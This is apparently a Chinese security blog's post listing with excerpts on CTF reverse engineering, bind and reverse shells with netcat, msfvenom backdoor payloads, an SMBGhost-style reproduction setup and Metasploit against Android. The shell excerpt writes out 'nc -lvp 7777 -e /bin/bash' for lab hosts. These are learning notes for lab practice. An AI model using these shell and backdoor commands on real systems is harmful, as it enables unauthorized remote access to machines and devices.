摘要: day51 9.16 [watevrCTF2019]Repyc uncompyle6 -o 3nohtyp.py 3nohtyp.pyc 乱码 佤 = 0 侰 = ~佤 * ~佤 俴 = 侰 + 侰 def 䯂(䵦): 굴 = 佤 굿 = 佤 괠 = [佤] * 俴 ** (俴 * 俴) 궓 = [ 阅读全文
posted @ 2021-04-27 23:59 best0st 阅读(292) 评论(0) 推荐(0)
摘要: re的刷题 day1 5.5 easyre 拖进ida,shift+F12查找flag IDA Pro:交互式反汇编器,是典型的递归下降反汇编器。 导航条: 蓝色 表示常规的指令函数 黑色 节与节之间的间隙 银白色 数据内容 粉色 表示外部导入符号 暗黄色 表示ida未识别的内容 IDA主界面: I 阅读全文
posted @ 2021-04-27 23:57 best0st 阅读(582) 评论(0) 推荐(0)
摘要: 正向shell 靶机 nc -lvp 7777 -e /bin/bash 攻击机 nc ip 7777 反向shell 1. 操作步骤 环境 攻击端:192.168.31.199 靶机:192.168.31.91 ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bas 阅读全文
posted @ 2021-04-28 00:11 best0st 阅读(103) 评论(0) 推荐(0)
摘要: Msfvenom命令 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -pay 阅读全文
posted @ 2021-04-28 00:06 best0st 阅读(309) 评论(0) 推荐(0)
摘要: 永恒之黑复现 准备 目标主机 Windows 10, Version 1903 下载链接:ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55 阅读全文
posted @ 2021-04-28 00:04 best0st 阅读(151) 评论(0) 推荐(0)
摘要: 照搬Sp4ce大神的: https://bbs.ichunqiu.com/thread-49591-1-1.html 版本名 是否可被攻击 攻击条件 5.0.0 否 无 5.0.1 否 无 5.0.2 否 无 5.0.3 否 无 5.0.4 否 无 5.0.5 否 无 5.0.6 否 无 5.0.7 阅读全文
posted @ 2021-04-28 00:03 best0st 阅读(237) 评论(0) 推荐(0)
摘要: msf android 0.adb命令 查看当前连接设备: 查看当前连接设备: adb devices 如果发现多个设备: adb -s 设备号 其他指令 举例: adb -s devicel install xxx.apk 查看顶部Activity: windows环境下: adb shell d 阅读全文
posted @ 2021-04-28 00:02 best0st 阅读(480) 评论(0) 推荐(0)